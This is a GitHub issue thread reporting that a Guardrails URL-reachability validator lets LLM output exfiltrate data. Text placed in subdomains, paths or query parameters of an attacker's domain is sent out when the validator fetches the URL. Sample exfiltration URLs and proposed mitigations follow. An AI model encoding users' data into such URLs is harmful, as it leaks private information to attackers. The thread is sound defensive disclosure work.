
[bug] Endpoint is reachable Validator "Zero-click" Vulnerability

Open lihter opened this issue 11 months ago • 5 comments

Describe the bug

The Endpoint is reachable validator has a zero-click vulnerability. When the validator checks whether an endpoint is reachable, the requested URL can point to a malicious domain, so the request itself can exfiltrate data through subdomains, URL paths, and query parameters.

Examples of exfiltrating data through calling malicious endpoints:

  • Query parameter example: https://www.malicious-domain.co.uk/path?firstName=John&lastName=Doe&pass=johndoe123&username=johndoe
  • Subdomain example: https://johndoe123.johndoe.malicious-domain.com/
  • Path example: https://malicious-domain.com/john/doe/johndoe123/johndoe
  • Of course, those can be combined.
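To make the three channels concrete, here is a minimal sketch that splits a URL into the parts where data can hide. It only uses the standard library's `urllib.parse`; the function name `exfil_channels` is hypothetical and not part of Guardrails.

```python
from urllib.parse import parse_qs, urlsplit


def exfil_channels(url: str) -> dict:
    """Return the URL components that the receiving side gets to observe."""
    parts = urlsplit(url)
    return {
        # Host labels are sent in DNS lookups and in the Host header.
        "host_labels": (parts.hostname or "").split("."),
        # Path segments are part of the request target the server receives.
        "path_segments": [seg for seg in parts.path.split("/") if seg],
        # Query parameters are part of the request target as well.
        "query": parse_qs(parts.query),
    }


channels = exfil_channels(
    "https://johndoe123.johndoe.malicious-domain.com/john/doe?pass=johndoe123"
)
print(channels)
```

Any of the three fields can carry the data, which is why stripping only the query string would not close the hole.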

To Reproduce

Steps to reproduce the behavior:

  1. The attacker owns a (malicious) domain.
  2. The Endpoint is reachable validator is applied when configuring Guardrails.
  3. The LLM adds the data to exfiltrate to an endpoint URL on the malicious domain.
  4. The validator function requests that endpoint, which contains the data.
  5. The attacker has the data.

Note: The reachability check can pass or fail. Either way, once a request has been made to the malicious domain (with the data in any form), the attacker has exfiltrated the data.

Expected behavior

I see 3 possible solutions:

  • remove Endpoint is reachable validator
  • check only if the host is reachable (e.g. for https://www.subdomain.malicious-domain.co.uk/path?firstName=John&lastName=Doe&pass=johndoe123&username=johndoe check https://www.malicious-domain.co.uk/) [Also in that case we might need to consider renaming to host_is_reachable]
  • have a white and black list of URLs when configuring the validator
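A rough sketch of the second option, assuming we reduce the URL to scheme, host, and port before making any request. The helper name `host_only` is hypothetical. Note that this keeps the subdomain labels; cutting down to the registrable domain (as in the `co.uk` example above) would need the Public Suffix List, which the standard library does not ship.

```python
from urllib.parse import urlsplit, urlunsplit


def host_only(url: str) -> str:
    """Drop userinfo, path, query, and fragment; keep scheme, host, and port."""
    parts = urlsplit(url)
    host = parts.hostname
    if not host:
        raise ValueError(f"no host in URL: {url!r}")
    # urlsplit strips the brackets from IPv6 literals, so put them back.
    netloc = f"[{host}]" if ":" in host else host
    if parts.port is not None:
        netloc = f"{netloc}:{parts.port}"
    return urlunsplit((parts.scheme, netloc, "/", "", ""))


print(host_only(
    "https://www.subdomain.malicious-domain.co.uk/path?firstName=John&pass=johndoe123"
))
```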

I'm open to any other suggestions. I'll propose a PR with the implementation of the 2nd proposed solution.

Library version: Version (e.g. 0.4.2)

Mar 21 '24 13:03 lihter

Thanks for the PR! I’m a big fan of this change in theory but I do have a few follow ups

  1. I think we lose a lot by losing the ability to hit specific paths
  2. I’m fine with losing the ability to hit urls + query params
  3. Is there a way to do this without fetching the entire endpoint? Like some tcp/http strat where we just do a reach out without requesting the full page? Like HEADing it?

Mar 23 '24 05:03 zsimjee

I also love the suggestion of having lists of url regexes that are allowed/blocked

Mar 23 '24 05:03 zsimjee

  1. I think we lose a lot by losing the ability to hit specific paths

Agree! I like the feature, but unfortunately, it introduces a vulnerability/possible misuse, so I think we should agree on some compromise solution. But, of course, it's your call.

  2. I’m fine with losing the ability to hit urls + query params

Noted 🙂

  3. Is there a way to do this without fetching the entire endpoint? Like some tcp/http strat where we just do a reach out without requesting the full page? Like HEADing it?

After thinking this through, I think checking DNS records might be useful... This way we won't ping the target server, but we'll know if the URL can be resolved to an actual IP address. I think we can use socket.getaddrinfo() for this purpose.
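Roughly what I have in mind, as a sketch only (the function name `host_resolves` is hypothetical). One caveat I'm aware of: resolving a name under an attacker-controlled domain can still deliver the hostname, subdomain labels included, to that domain's DNS servers, so this would narrow the problem rather than remove it.

```python
import socket
from urllib.parse import urlsplit


def host_resolves(url: str) -> bool:
    """Return True if the URL's host resolves to at least one address."""
    host = urlsplit(url).hostname
    if not host:
        return False
    try:
        # Port is None: only name resolution matters here, not a service.
        return len(socket.getaddrinfo(host, None)) > 0
    except (socket.gaierror, UnicodeError):
        # gaierror: the name did not resolve; UnicodeError: invalid host label.
        return False
```

No HTTP request is sent here, so the path and query string never leave the machine.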

Please let me know what you think and if I can make the PR with said DNS records solution. Also ping me, if you have any additional questions. I'll be more than happy to make the changes to the code 🙂

Mar 28 '24 15:03 lihter

I like the socket.getaddrinfo() idea, but unfortunately that doesn't tell us whether an HTTP endpoint is open. I think it would be good to combine this approach with the HEAD request approach defined here - https://realpython.com/site-connectivity-checker-python/

I also want to add that we should put this functionality under a head_only param passed to the validator constructor. When that value is true (which it should be by default), the validator will only check HEAD and socket info. When it's false, it'll do the existing logic.
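A minimal sketch of how that flag could look, with some assumptions: it uses the standard library's `urllib.request` rather than `requests` so it runs without extra dependencies, the function signature is hypothetical, and a plain GET stands in for the existing logic, which this sketch does not reproduce.

```python
import http.client
import urllib.error
import urllib.request
from urllib.parse import urlsplit


def endpoint_is_reachable(url: str, head_only: bool = True, timeout: float = 5.0) -> bool:
    """Return True if the server answers with a successful HTTP status."""
    # Refuse non-HTTP schemes such as file:// that urllib would otherwise open.
    if urlsplit(url).scheme not in ("http", "https"):
        return False
    method = "HEAD" if head_only else "GET"
    try:
        request = urllib.request.Request(url, method=method)
        # The response body is never read in either mode.
        with urllib.request.urlopen(request, timeout=timeout) as response:
            return 200 <= response.status < 300
    except (urllib.error.URLError, http.client.HTTPException, OSError, ValueError):
        # HTTPError (4xx/5xx) is a URLError subclass, so error statuses land here.
        return False
```

Usage would be `endpoint_is_reachable("https://example.com/health")` for the default HEAD mode, or `head_only=False` to opt into the full request.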

As far as the zero-click vulnerability goes, we should absolutely document and mitigate it, but I think it's not possible to get rid of totally. So for this code path, I think we should do the following:

  1. add a warning saying "Full requests will be made to this site" and log the site name each time
  2. include 2 params as you recommended allowed_domains and blocked_domains
  3. ensure that there isn't a tertiary concern around remote script execution - if we pull down a site with scripts in it, we want to make sure those scripts do not execute. This could be as simple as never touching the body of the response and only checking the HTTP status code
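Points 1 and 2 could be sketched as a gate that runs before any request is made. This is only an illustration: the function names and the subdomain matching rule are assumptions, while `allowed_domains` and `blocked_domains` are the params mentioned above.

```python
import logging
from urllib.parse import urlsplit

logger = logging.getLogger("endpoint_is_reachable")


def _matches(host, domains):
    """True if host equals a listed domain or is a subdomain of one."""
    return any(host == d.lower() or host.endswith("." + d.lower()) for d in domains)


def may_request(url, allowed_domains=None, blocked_domains=None):
    """Decide whether the validator is permitted to contact this URL at all."""
    host = urlsplit(url).hostname or ""
    if not host:
        return False
    # The block list wins over the allow list.
    if blocked_domains and _matches(host, blocked_domains):
        return False
    # An allow list, when given, must contain the host's domain.
    if allowed_domains is not None and not _matches(host, allowed_domains):
        return False
    logger.warning("Full requests will be made to this site: %s", host)
    return True
```

Accepting subdomains of an allowed domain keeps the subdomain channel open for that domain, so this only makes sense when everything on the allow list is trusted.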

Mar 29 '24 00:03 zsimjee

I understand; I'll set aside the DNS idea then. 🙂

Concerning the head_only parameter, its inclusion in the validator's constructor puzzles me. I can't envision a scenario where fetching the body is necessary to ascertain if the endpoint_is_reachable. Thus, I believe we can always opt for a requests.head(endpoint) to obtain the HTTP header, simplifying our approach.

However, even when we limit our request to just the header, the vulnerability persists, and an attacker could access the data, just as before.
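To illustrate, here is a small local demo, with a throwaway server on 127.0.0.1 standing in for the attacker's host. It uses the standard library's `urllib.request` instead of `requests.head` so it is self-contained; the handler and variable names are made up for the example.

```python
import http.server
import threading
import urllib.request

seen_paths = []


class RecordingHandler(http.server.BaseHTTPRequestHandler):
    """Stands in for the attacker's server: records every request target."""

    def do_HEAD(self):
        seen_paths.append(self.path)
        self.send_response(200)
        self.end_headers()

    def log_message(self, format, *args):
        pass  # keep the demo quiet


# Port 0 lets the OS pick a free port.
server = http.server.HTTPServer(("127.0.0.1", 0), RecordingHandler)
threading.Thread(target=server.serve_forever, daemon=True).start()
port = server.server_address[1]

# An empty ProxyHandler bypasses any configured proxy so the demo stays local.
opener = urllib.request.build_opener(urllib.request.ProxyHandler({}))
request = urllib.request.Request(
    f"http://127.0.0.1:{port}/path?username=johndoe&pass=johndoe123",
    method="HEAD",
)
with opener.open(request, timeout=5) as response:
    status = response.status

server.shutdown()
server.server_close()

print(status, seen_paths)
```

The server never sends a body, yet it has already received the full path and query string by the time it answers.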

Regarding the list of domains, I think choosing just one will suffice. My recommendation is to use allowed_domains, but I'd like your confirmation. Would you prefer this as an initializer parameter or a function parameter?

As for the tertiary concern about remote script execution, I wouldn't worry too much. Python's requests library only fetches the response; it does not parse or execute scripts in the body.

Mar 29 '24 07:03 lihter

This issue is stale because it has been open 30 days with no activity. Remove stale label or comment or this will be closed in 14 days.

Aug 22 '24 03:08 github-actions[bot]

This issue was closed because it has been stalled for 14 days with no activity.

Sep 05 '24 03:09 github-actions[bot]